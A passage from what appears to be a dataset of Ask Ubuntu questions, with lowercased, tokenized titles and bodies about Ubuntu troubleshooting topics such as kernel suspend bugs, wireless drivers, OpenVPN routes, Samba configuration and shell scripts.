langdalepl-gvfs-mtp-precise.list.save precise-partner.list michael-gruz-canon-precise.list precise-partner.list.save but i do n't understand what to look for in this list of files . i suspect that the culprits is michael-gruz-canon-precise.list , but that does n't help me much . i hope i put all the necessary info here . thank you for your help
473201	audacity tries to open files it should n't	i have audacity installed from the audacity automatic installer . files not related to audacity , and indeed not even sound files , are associated with audacity that should not be . for instance , .deb , .tar.gz , and various executable files which would ordinarily be automatically opened with appropriate software are instead associated with audacity , which can not open or run these files . i 'm not overly capable when it comes to technical things in this operating system , and i have n't seen a similar problem with audacity specifically anywhere else i 've looked , anyone have any ideas for a fix to get files opened and run by appropriate things ?
473204	ubuntu 14.04 doesnt lock screen if vmwareplayer is full screen . but if virtualbox is full screen it locks . why ?	i have a fresh install of ubuntu 14.04 with vmware player and virtualbox . when i open my xp vm and leave it in full screen , the ubuntu 14.04 will lock the screen after 10 minutes which is great . but if i open my xp in vmware , and full screen it , it never locks the screen . it might be a bug : reproduce via : install ubuntu 14.04 ( or 12.04 ) fresh with nothing special install vmware-player ( 5 , or 6 , or latest still have this issue ) . make a regular vm with nothing installed ( or use a xp , or 7 or debian vm ) full screen it , and wait 10 minutes . you come back after 10-15 minutes and move the mouse , and will notice that the vm is fully accessible and the screen is not locked . if you un-full screen it now , it will lock screen . ... i believe this is a bug perhaps ? because ; virtualbox in the same situation will be lock-screened when it has a full-screen vm . can anyone help me ? thank you so much .
473214	laptop suspend broken after latest kernel update	i ran a software update ( ubuntu 14.04 ) on my laptop over the weekend , which included an update from kernel 3.13.0-24 to 3.13.0-27 , among other things . today i had to take my laptop to work , so closed the lid and put it in my bag . however , it never went into suspend mode ! i tried several times , even rebooting . finally i tried the previous kernel from the grub menu ( reverting back to the -24 one ) and suspend works the same as it always had before . did something suspend related change between the -24 and -27 kernels used in ubuntu 14.04 ? i think by only reverting to a previous kernel to temporarily fix it , i 've ruled out any other software changes made during the weekend 's upgrade . edit : i 've compared my syslog after an unsuccessful suspend with the results with the working kernel , and here 's where they differ : after these lines which appear in both logs , may 28 13:44:20 inanna kernel : [ 559.606085 ] nouveau [ drm ] suspending client object trees ... may 28 13:44:20 inanna kernel : [ 559.607177 ] nouveau [ drm ] suspending kernel object tree ... the non-working suspend continues with may 28 13:44:20 inanna kernel : [ 561.606427 ] nouveau e [ pdisp ] [ 0000:01:00.0 ] [ 0xc000857c ] [ ffff880035a4af80 ] fini timeout , 0xc2061008 may 28 13:44:20 inanna kernel : [ 561.606429 ] nouveau e [ pdisp ] [ 0000:01:00.0 ] [ 0xc000857c ] [ ffff880035a4af80 ] failed suspend , -16 may 28 13:44:20 inanna kernel : [ 561.606430 ] nouveau e [ drm ] 0xd1500000:0xd15c7c00 suspend failed with -16 may 28 13:44:20 inanna kernel : [ 561.606447 ] nouveau e [ drm ] 0xdddddddd:0xd1500000 suspend failed with -16 may 28 13:44:20 inanna kernel : [ 561.606535 ] nouveau e [ drm ] 0xffffffff:0xdddddddd suspend failed with -16 may 28 13:44:20 inanna kernel : [ 561.607173 ] nouveau e [ drm ] 0xffffffff:0xffffffff suspend failed with -16 may 28 13:44:20 inanna kernel : [ 561.607273 ] nouveau [ drm ] resuming display ... may 28 13:44:20 inanna kernel : [ 561.607294 ] nouveau e [ drm ] bo ffff880092b8bc00 pinned elsewhere : 0x00000002 vs 0x00000004 may 28 13:44:20 inanna kernel : [ 561.607295 ] [ drm : drm_helper_resume_force_mode ] *error* failed to set mode on crtc ffff88024e006000 may 28 13:44:20 inanna kernel : [ 561.607324 ] pci_pm_suspend ( ) : nouveau_pmops_suspend+0x0/0xb0 [ nouveau ] returns -16 may 28 13:44:20 inanna kernel : [ 561.607327 ] dpm_run_callback ( ) : pci_pm_suspend+0x0/0x150 returns -16 may 28 13:44:20 inanna kernel : [ 561.607329 ] pm : device 0000:01:00.0 failed to suspend async : error -16 may 28 13:44:20 inanna kernel : [ 561.607485 ] pm : some devices failed to suspend , or early wake event detected
473217	i ca n't delete old kernel , ubuntu 14.04	i have tried ubuntu tweak , synaptic and some command line stuff i found online , but nothing seems to work . this is the output of dpkg -l linux-image-\* | grep ^ii ii linux-image-3.13.0-24-generic 3.13.0-24.47 amd64 linux kernel image for version 3.13.0 on 64 bit x86 smp ii linux-image-extra-3.13.0-24-generic 3.13.0-24.47 amd64 linux kernel extra modules for version 3.13.0 on 64 bit x86 smp ii linux-image-generic 3.13.0.24.29 amd64 generic linux kernel image what are my options ? i only need to free 3 mb for a the kernel update . thanks in advance ! when i run this , i get that output : $ sudo update-grub generando archivo de configuración grub ... se encontró una imagen linux : /boot/vmlinuz-3.13.0-24-generic se encontró una imagen initrd : /boot/initrd.img-3.13.0-24-generic se encontró una imagen linux : /boot/vmlinuz-3.0.0-19-generic se encontró una imagen initrd : /boot/initrd.img-3.0.0-19-generic se encontró una imagen linux : /boot/vmlinuz-3.0.0-17-generic se encontró una imagen initrd : /boot/initrd.img-3.0.0-17-generic se encontró una imagen linux : /boot/vmlinuz-3.0.0-16-generic se encontró una imagen initrd : /boot/initrd.img-3.0.0-16-generic se encontró una imagen linux : /boot/vmlinuz-3.0.0-12-generic se encontró una imagen initrd : /boot/initrd.img-3.0.0-12-generic found memtest86+ image : /memtest86+.elf found memtest86+ image : /memtest86+.bin encontrado en windows 7 ( loader ) en /dev/sda1 encontrado en windows 7 ( loader ) en /dev/sda8 hecho but when i try to delete one of those entries , i get this : $ sudo apt-get purge linux-image-3.0.0-12-generic leyendo lista de paquetes ... hecho creando árbol de dependencias leyendo la información de estado ... hecho e : no se ha podido localizar el paquete linux-image-3.0.0-12-generic e : no se pudo encontrar ningún paquete con la expresión regular «linux-image-3.0.0-12-generic» basically , it says it does n't find the package or image i 'm trying to delete . $ dpkg -l linux-image* deseado=desconocido/instalar/eliminar/purgar/retener | estado=no/instalado/config-files/desempaquetado/medio-conf/medio-inst/espera-disparo/pendiente-disparo |/ err ? = ( ninguno ) /requiere-reinst ( estado , err : mayúsc.=malo ) ||/ nombre versión arquitectura descripción +++-==================================================-==============================-==============================-========================================================================================================== un linux-image < ninguna > < ninguna > ( no hay ninguna descripción disponible ) un linux-image-3.0 < ninguna > < ninguna > ( no hay ninguna descripción disponible ) ii linux-image-3.13.0-24-generic 3.13.0-24.47 amd64 linux kernel image for version 3.13.0 on 64 bit x86 smp ii linux-image-extra-3.13.0-24-generic 3.13.0-24.47 amd64 linux kernel extra modules for version 3.13.0 on 64 bit x86 smp ii linux-image-generic ps : is it possible to delete the current kernel or the extras ( linux-image-extra-3.13.0-24-generic ) and , at the same time , install the newest kernel , all of this using synaptic ?
473219	xubuntu alt+tab behavior	i 'm using xubuntu 14.04 and i want to change the alt+tab behavior . in xubuntu it just have the option to alternate between applications , but i prefer something like gnome shell or unity , that have the `` alt+` '' to change between windows of the same instance . this is possible ?
473220	latest update to ubuntu 13.10 broke intel graphics drivers	i 'm running a copy of ubuntu 13.10 on an i7-4771 w/ intel hd4600 graphics using a dell ultrasharp 1440p monitor via displayport . up until today this configuration has been working perfectly , however the latest update appears to have broken my graphics configuration , and xorg is now refusing to go above 1280p resolution . running xrandr it appears the driver incorrectly thinks my monitor is plugged into the hdmi port and is detecting a max resolution of 1920x1200 instead of 2560x1440 . ( it 's actually plugged in via displayport ) . based on the apt history.log , the latest update was for the kernel . i 'm presuming the issue is that the official intel driver has n't been updated to support this version ? is there any way to resolve this , or will i need to upgrade to 14.10 to get the latest driver from intel ? start-date : 2014-05-28 11:30:57 commandline : aptdaemon role='role-commit-packages ' sender=':1.473' install : linux-image-extra-3.11.0-22-generic : amd64 ( 3.11.0-22.38 ) , linux-image-3.11.0-22-generic : amd64 ( 3.11.0-22.38 ) , linux-headers-3.11.0-22 : amd64 ( 3.11.0-22.38 ) , linux-headers-3.11.0-22-generic : amd64 ( 3.11.0-22.38 )
473221	broadcom wireless issues in lubuntu 14.04	i recently installed lubuntu 14.04 on my parents ' old laptop , and i 've been having a super difficult time getting the broadcom card up and running . i 've been following this thread : installing broadcom wireless drivers ... but i 'm still stuck . lspci -vnn | grep network showed : 06:05.0 network controller [ 0280 ] : broadcom corporation bcm4306 802.11b/g wireless lan controller [ 14e4:4320 ] ( rev 02 ) iwconfig showed : lo no wireless extensions . eth0 no wireless extensions . i 've installed b43-firmware-installer and b43-fwcutter and also the linux-firmware-nonfree package . at boot , i keep getting a b43-phy0 error , so i tried sudo rmmod b43 , and i got : rmmod : error : module b43 is not currently loaded i also tried : dmesg | grep b43 [ 17.318405 ] b43legacy-phy0 : broadcom 4306 wlan found ( core revision 4 ) [ 17.384870 ] b43legacy-phy0 : loading firmware b43legacy/ucode4.fw [ 18.046777 ] b43legacy ssb0:0 : direct firmware load failed with error -2 [ 18.046785 ] b43legacy ssb0:0 : falling back to user helper [ 18.047858 ] b43legacy-phy0 error : firmware file `` b43legacy/ucode4.fw '' not found or load failed . [ 18.047965 ] b43legacy-phy0 error : you must go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware ( version 3 ) . i went to url it told me to , but it did n't tell me to do anything i have n't already tried . any help and/or suggestions would be greatly appreciated !
473222	ubuntu server 14.04 shutdown upon being inactive	actually i want to keep the machine up and running all through , never shutdown . may be if can schedule it to go hibernate and back , would be useful .
473223	why is pulseaudio used in ubuntu instead of plain old alsa ?	pulseaudio seems like just an extra layer on top of alsa . what features does it add to the system ? what are some reasons for users not to remove it and just use alsa ?
473225	error : linux route add command failed : external program exited with error status : 4	a remote machine running fedora uses openvpn , and multiple developers were successfully able to connect to it via their client openvpn . however , i am running ubuntu 12.04 and i am having trouble connecting to the server via vpn . i copied ca.crt , home.key , and home.crt from the server to my local machine to /etc/openvpn folder . my client.conf file looks like this : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # sample client-side openvpn 2.0 config file # # for connecting to multi-client server . # # # # this configuration can be used by multiple # # clients , however each client should have # # its own cert and key files . # # # # on windows , you might want to rename this # # file so it has a .ovpn extension # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # specify that we are a client and that we # will be pulling certain config file directives # from the server . client # use the same setting as you are using on # the server . # on most systems , the vpn will not function # unless you partially or fully disable # the firewall for the tun/tap interface . ; dev tap dev tun # windows needs the tap-win32 adapter name # from the network connections panel # if you have more than one . on xp sp2 , # you may need to disable the firewall # for the tap adapter . ; dev-node mytap # are we connecting to a tcp or # udp server ? use the same setting as # on the server . ; proto tcp proto udp # the hostname/ip and port of the server . # you can have multiple remote entries # to load balance between the servers . remote xx.xxx.xx.130 1194 ; remote my-server-2 1194 # choose a random host from the remote # list for load-balancing . otherwise # try hosts in the order specified . ; remote-random # keep trying indefinitely to resolve the # host name of the openvpn server . very useful # on machines which are not permanently connected # to the internet such as laptops . resolv-retry infinite # most clients do n't need to bind to # a specific local port number . nobind # downgrade privileges after initialization ( non-windows only ) ; user nobody ; group nogroup # try to preserve some state across restarts . persist-key persist-tun # if you are connecting through an # http proxy to reach the actual openvpn # server , put the proxy server/ip and # port number here . see the man page # if your proxy server requires # authentication . ; http-proxy-retry # retry on connection failures ; http-proxy [ proxy server ] [ proxy port # ] # wireless networks often produce a lot # of duplicate packets . set this flag # to silence duplicate packet warnings . ; mute-replay-warnings # ssl/tls parms . # see the server config file for more # description . it 's best to use # a separate .crt/.key file pair # for each client . a single ca # file can be used for all clients . ca ca.crt cert home.crt key home.key # verify server certificate by checking # that the certicate has the nscerttype # field set to `` server '' . this is an # important precaution to protect against # a potential attack discussed here : # http : //openvpn.net/howto.html # mitm # # to use this feature , you will need to generate # your server certificates with the nscerttype # field set to `` server '' . the build-key-server # script in the easy-rsa folder will do this . ns-cert-type server # if a tls-auth key is used on the server # then every client must also have the key . ; tls-auth ta.key 1 # select a cryptographic cipher . # if the cipher option is used on the server # then you must also specify it here . ; cipher x # enable compression on the vpn link . # do n't enable this unless it is also # enabled in the server config file . comp-lzo # set log file verbosity . verb 3 # silence repeating messages ; mute 20 but when i start server and look in /var/log/syslog , i notice the following error : may 27 22:13:51 myuser ovpn-client [ 5626 ] : /sbin/route add -net 10.27.12.1 netmask 255.255.255.252 gw 10.27.12.37 may 27 22:13:51 myuser ovpn-client [ 5626 ] : error : linux route add command failed : external program exited with error status : 4 may 27 22:13:51 myuser ovpn-client [ 5626 ] : /sbin/route add -net 172.27.12.0 netmask 255.255.255.0 gw 10.27.12.37 may 27 22:13:51 myuser ovpn-client [ 5626 ] : /sbin/route add -net 10.27.12.1 netmask 255.255.255.255 gw 10.27.12.37 i am actually able to ssh into the server using a lan ip address , so it appears to be working . but why does this error occur ? how can i resolve it ?
473227	gnu radio compiler	after receiving the signal i want to store the received signal of the spectrum analyzer . i did not find an option . i tried print screen but the resolution is very low . how do we save the output of the spectrum analyzer of the grc ?
473228	why ca n't i update to 11.04 ?	i am using ubuntu 10.10 maverick 64 bit , and i can browse the internet fine . i am typing this using the machine . when i attempt to use the ubuntu update manager to update to 11.04 , i get this error message : failed to fetch fetching the upgrade failed.there may be a network problem . and when i try to change servers , here is what i get : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/maverick/main/source/sources.gz 404 not found [ ip : 91.189.91.15 80 ] it repeats with other lines , 404 not found . some index files failed to download , they have been ignored , or old ones used instead . any ideas ?
473229	bash script not adding variables to session	i have a bash script that i have added as a startup application . it does a bunch of exports and alias assignment . # ! /bin/bash alias devhm='cd $ { dev_home } ; ll ' ; alias wlhm='cd $ { wl_home } ; ll ' ; alias dirch='watch -- interval=1 `` ls -la '' ' ; alias vols='watch -- interval=1 `` df -h '' ' ; alias svn-update='svn update -- depth infinity ./* ' ; alias mci= '' ~/mci.sh '' ; alias vncserver= '' vncserver -geometry 1680x1050 '' ; alias ..= '' cd .. '' ; alias hist= '' history | grep `` ; export proxy_host=proxy.my.setup ; export proxy_port=3128 ; export ld_library_path= $ ld_library_path/usr/lib/oracle/12.1/client64/lib ; export oracle_home=/usr/lib/oracle/12.1/client64 ; export tns_admin= $ { oracle_home } /network/admin ; echo `` done ! `` ; but none of these values are available in my terminal sessions anymore . even when i run the script straight into the terminal like so : ./setup.sh i see the `` done ! '' prompt printed but no aliases or env variables are set . if i copy and paste the contents of the file into the terminal the aliases and env variables are set . i have tried adding a line to execute the script from .bashrc also but still no aliases or env variables set . any ideas what might be going on here ? also could anyone suggest a better way to have these env variables/aliases added to every terminal session ?
473230	malformed file warning on boot	about 1/3 of the time that i boot my laptop , i get an error message that says error : malformed file . press any key to continue ... i press a key , and then my computer boots up and i ca n't discern any negative effects . it 's kind of disconcerting , and does delay the boot process . how do i resolve this error and ensure my system is stable ?
473231	not sure which ubuntu to install ( 64 or 32 bit )	i want to use ubuntu . i have win 7 home premium 32-bit right now ... i used to have 64 on this laptop ( toshiba satellite c650 ) but my disc got a ring of death . intel penium cpu b940 2.00ghz , 4gb ram also , i 'm guessing i need an image mounter such as poweriso to install ubuntu , if i do n't have a dvd lying around that i can mount to ? i 'm a noob . thanks for your help , in advance . edit : my question was n't clear ... can my processor and ram handle 64-bit ubuntu ? hell of a lot nicer than win7
473234	how to run lubuntu 14.04 in non gui	i want to be able to run lubuntu 14.04 in non gui mode . i also want an easy way to switch between the two modes .
473236	renaming hundreds of files at once for proper sorting	i have a ton of files , all named stuff like 1.jpg , 2.jpg , 3.jpg , and so on up to 1439.jpg , however , i have a problem with one of my projects and alphabetizing . it will usually go in the order 1.jpg , 10.jpg , 11.jpg and so on . what i need is some way to name the files so they are in the format such as 00001.jpg all the way up to 01439.jpg . how would i be able to do this quickly and efficiently ?
473243	intalling panasonic kx-flb 802 multi-function station in ubuntu 14.04	where to find drivers for panasonic kx-flb 802 multi-function station in ubuntu 14.04 64 bit nandakumar
473244	wrong display diagonal size	absolutely new to ubuntu and linux in general , but the side menu and top menu do not appear on the screen . i have tried finding a way to fixcitcwith xrandr , but no luck so far . the displays menu shows it as a 32 '' screen when it is a 57 '' screen . any idea for a fix 14.04 ubuntu mitsubishi 57 inch screen wd-57831 connected by dvi
473246	ln works on command line but not in script	i try this : for file in `ls -1 ../files/file_ ? ? _ ? ? .dat` ; do echo `` $ file '' ; ln `` $ file '' ; done and for every file it gives this error : ln : failed to create hard link ‘./file_01_am.dat’ = > ‘../files/file_01_am.dat’ : no such file or directory but on the command line this works fine : ln ../files/file_01_am.dat why does ln fail in the loop ( also just written directly on the command line ) and not fail on the command line when executed directly ? just for info , the following command also fails in the same way as the loop above ( this one also tries absolute pathnames for good measure ) : find /media/files -name `` file_ ? ? _ ? ? .dat '' -print0 | xargs -0 -l 1 ln i really do not want to have to manually hard link every file ! the files directory is a mounted smb file system . what is strange is the ln command works fine if i issue it directly , just not when done in a loop of any kind . please help .
473249	archive with all previous versions of all packages , or what is general way to install exact old version of some package	sometimes i need to install old version of some package ( s ) : unfortunately , newer is n't always better , we might have some regressions , bugs , etc . it does n't happen often but it happens . to be safe , i try to keep all old versions of deb packages in my local apt cache , but anyway i already faced such problems when i need to downgrade package , and i do n't have deb package of the version i need . the only thing i 'm left with then is to google exact version of package ( probably google exact filename of deb package ) , but if i failed to find it , then i 'm totally out of luck . i believe it 's not so technically hard to keep archive with all versions of all packages , and it might help to avoid a lot of pain . so , is there something like that ? or , how should i look for exact ( old ) version of some package ?
473251	the wireless disconnected in bcm4312 on ubuntu 14.04	i upgraded my ubuntu 10.10 for ubuntu 14.04 and when start up the wireless disconnected . how to connect the wireless ? ( bcm 4312 )
473252	map a network that i use	i am not running a network i.e i am not a network administrator , but i want to map the network for learning . i have seen many applications that are used to map the network that i own . i want to know whether i can use the same applications to map any network from my laptop or are there some different applications
473255	no boot loader found - dual booting windows 8 with ubuntu 14.04	i have been trying in vain to dual boot my computer with windows 8 pro ( pre-installed ) and ubuntu 14.04 64-bit . i have been able to successfully install ubuntu 14.04 , but the option to start ubuntu does not appear on startup . this is after having taken all steps as mentioned in installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) . i even tried the boot repair option and ended up with this error log . my questions are : how do i solve for no boot loaders found in /dev/ ... ? are there any other recommendations that will help me solve this ? other points that may be important : booting into ubuntu from a live usb shows all ubuntu partitions on the hard drive .
473256	kubuntu custom livecd freezes during boot	i 'm trying to create a custom kubuntu 14.04 live cd image , following the instructions at https : //help.ubuntu.com/community/livecdcustomization . i 've performed the following steps : extract the contents of the official amd64 image as per instructions on that page using the chroot environment , i have made a minor configuration change ( add a file /etc/networking/interfaces.d/eth0 containing static configuration for the machine i intend to use the disc on ) installed several packages ( java 8 , mysql 5.5 , postgresql , vlc , flash plugin , and a handful of others ) using apt-get install , and installed a non-packaged download of eclipse in /opt followed the instructions to repackage the resulting files in either kvm or when burning the disc and booting on a physical machine , the system begins to boot fine , but hangs during startup . if i remove the quiet splash boot options , the messages stop after the following message : * starting cups-browsed - bonjour remote printer browsing daemon [ ok ] i 'm not familiar with the live cd environment at all , so am not sure how i 'd even find out what it 's supposed to do next . i know it is n't using sysvinit , so the fact that cups-browsed is n't symlinked to be started in any runlevel does n't surprise me much , but does mean that my usual approach ( find out what 's started next and try removing it ) is n't much use here !
473257	bash : config.sh : no such file or directory	whenever i open my terminal , it displays bash : config.sh : no such file or directory followed by the command prompt in the next line . my .bashrc file contains : source config.sh i mainly use ubuntu for root and pythia et al , which seem to be working alright , but could someone tell me the possible reason for this ? thank you .
473259	cgclassify `` cgroup one of the needed subsystems is not mounted '' for top level cgroups ?	playing around with cgroups and i have a few questions . if i create a new cgroup with cgcreate and then move processes into the group with echo or cgclassify everything work fine . however if i try and place any process or move a process from a custom group to default group then i get the error cgroup one of the needed subsystems is not mounted . sudo cgclassify -g cpu.shares : user 4094 sudo cgclassify -g cpu.shares : cpu 4094 i am also a little confused as to who can move processes around . i assume root can move any process to any group . can a user move processes to the default group once they have classified them into a group they own cgcreate -t alice : alice -a alice : alice ... are they `` stuck '' there ? one last question : manging all the limits per groups looks like it can become quiet complex . what happens if someone over-allocates cpu share for example ? it also appears that there are dependencies between some controllers . like cpuset.cpus and cpuset.mems . where is this documented ? thanks
473264	shell script wo n't run cd command	i have a text-based game , colossal cave adventure , that i would like to launch with a shell script instead of opening the terminal and typing `` cd ~/desktop/cca '' and `` ./adventure '' . the code i am trying to use is this : # ! /bin/bash gnome-terminal -e 'cd ~/desktop/cca/ ; ./adventure' and the message i receive is this : there was an error creating the child process for this terminal failed to execute child process `` cd '' ( no such file or directory ) with options to change profile preferences or relaunch the process . i have also tried using the absolute path instead of ~/ , and all of my file names are correctly spelled and point to the right place . what is wrong ?
473265	samba shares disapear on 14.04	here is my smb.conf file ( see at the end of this topic ) : i only changed workgroup to msshome to fit my own network settings . my problem is i do not see all the samba shares of my nas ( i.e when i navigate in explore the network > windows shares ) and the smbtree command gives me a partial view : smbtree enter laurent06000 's password : mshome \pc-de-ldp pc-de-ldp server ( samba , ubuntu ) \pc-de-ldp\print $ printer drivers \pc-de-ldp\ipc $ ipc service ( pc-de-ldp server ( samba , ubuntu ) ) \\mybooklive my book live network storage \\mybooklive\videos videos \\mybooklive\public public share \\mybooklive\smartware smartware \\mybooklive\timemachinebackup timemachinebackup \\mybooklive\timemachine timemachine \\mybooklive\ipc $ ipc service ( my book live network storage ) on the contrary i 'm able to see my attached shares under /run/user/1000/gvfs as can be seen below : laurent06000 @ pc-de-ldp : /run/user/1000/gvfs $ ls afp-volume : host=diskstation2.local , user=laurent06000 , volume=laurent06000 smb-share : server=diskstation2 , share=laurent06000 smb-share : server=diskstation , share=ldp smb-share : server=ls-wxl0b5 , share=share smb-share : server=mybooklive , share=videos smb-share : server=seagate-400e96 , share=laurent06000 smb-share : server=wdmycloud3 , share=laurent06000 smb-share : server=wdmycloud , share=laurent06000 does anyone have an idea about this problem ? # # sample configuration file for the samba suite for debian gnu/linux . # # # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options most of which # are not shown in this example # # some options that are often worth tuning have been included as # commented-out examples in this file . # - when such options are commented with `` ; '' , the proposed setting # differs from the default samba behaviour # - when commented with `` # '' , the proposed setting is the default # behaviour of samba but the option is considered important # enough to be mentioned here # # note : whenever you modify this file you should run the command # `` testparm '' to check that you have not made any basic syntactic # errors . # ======================= global settings ======================= [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = mshome # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = no # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want senter code hereamba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # server role . defines in which mode samba will operate . possible # values are `` standalone server '' , `` member server '' , `` classic primary # domain controller '' , `` classic backup domain controller '' , `` active # directory domain controller '' . # # most people will want `` standalone sever '' or `` member server '' . # running as `` active directory domain controller '' will require first # running `` samba-tool domain provision '' to wipe databases and create a # new domain . server role = standalone server # if you are using encrypted passwords , samba will need to know what # password database type you are using . ; passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # # the following settings only takes effect if 'server role = primary # classic domain controller ' , 'server role = backup domain controller' # or 'domain logons ' is set # # it specifies the location of the user's # profile directory from the client point of view ) the following # required a [ profiles ] share to be setup on the samba server ( see # below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes username map = /etc/samba/smbusers security = user ; encrypt passwords = yes ; guest ok = no ; guest account = nobody # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home directory as \\server\username ; [ homes ] ; comment = home directories ; browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . ; read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . # un-comment the following parameter to make sure that only `` username '' # can connect to \\server\username # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes ; guest ok = no ; read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers ; browseable = yes ; read only = yes ; guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin
473266	jbl speaker in samsung series 5	i 'm kind of frustrated . after upgrading from 12.04 to 14.04 i realized that the quality ( especially the subwoofers ) of my jbl speaker have a very poor quality . so i googled for it and found that : do i need any extra drivers for the realtek waves maxx audio on my dell xps 17 ? it had no effect in the first place , but after the updates that i installed yesterday the good sound was back ! i was excited ! i put my laptop to hibernate over night and this morning the sound was gone and the quality was poor again ... what can i do ?
473269	starting rhythmbox via crontab	i 'm getting tired of this issue now , because every version of ubuntu needs to be treated in another way , but in 14.04 i do n't know what to do anymore . my problem : my pc is starting automatically every day to act as my alert , because a crontab starts a script choosing a music to play , starts rhythmbox , add the chosen file or list to play queue and plays . the problem now is , the scripts works perfectly when i 'm running it from a terminal , but started by crontab rhythmbox is mostly not starting . my crontab : mailto= '' '' xauthority=~/.xauthority display=:0.0 # m h dom mon dow command */10 * * * * /scripts/copy_loop.sh & # start alert 50 6 * * 1 /scripts/alert.sh # mo 50 6 * * 2 /scripts/alert.sh # di 50 6 * * 3 /scripts/alert.sh # mi 50 6 * * 4 /scripts/alert.sh # do 50 6 * * 5 /scripts/alert.sh # fr 30 7 * * 6-7 /scripts/alert.sh # sa/so the /script/copy_loop.sh script is another script which runs perfectly ( but it does n't have to start a program at all ... ) alert-script : # ! /bin/bash logfile= '' /scripts/log/alert.log '' exec > > $ logfile 2 > & 1 echo `` *********************************** '' echo `` * start ( `` `date + ' % d. % m. % y % h : % m'` '' ) as `whoami` * '' echo `` *********************************** '' # to avoid heart-attacks ; ) amixer set master 14 echo `` turning monitors on and waiting 5 seconds . '' # force monitor to turn on ( grafik bug ! ) xset dpms force on sleep 5 # how many days should a song be blocked ? days=25 # create array of music music= ( `` dubstep von hannes/1-45 the sound of dubstep 4 - mix 1.mp3 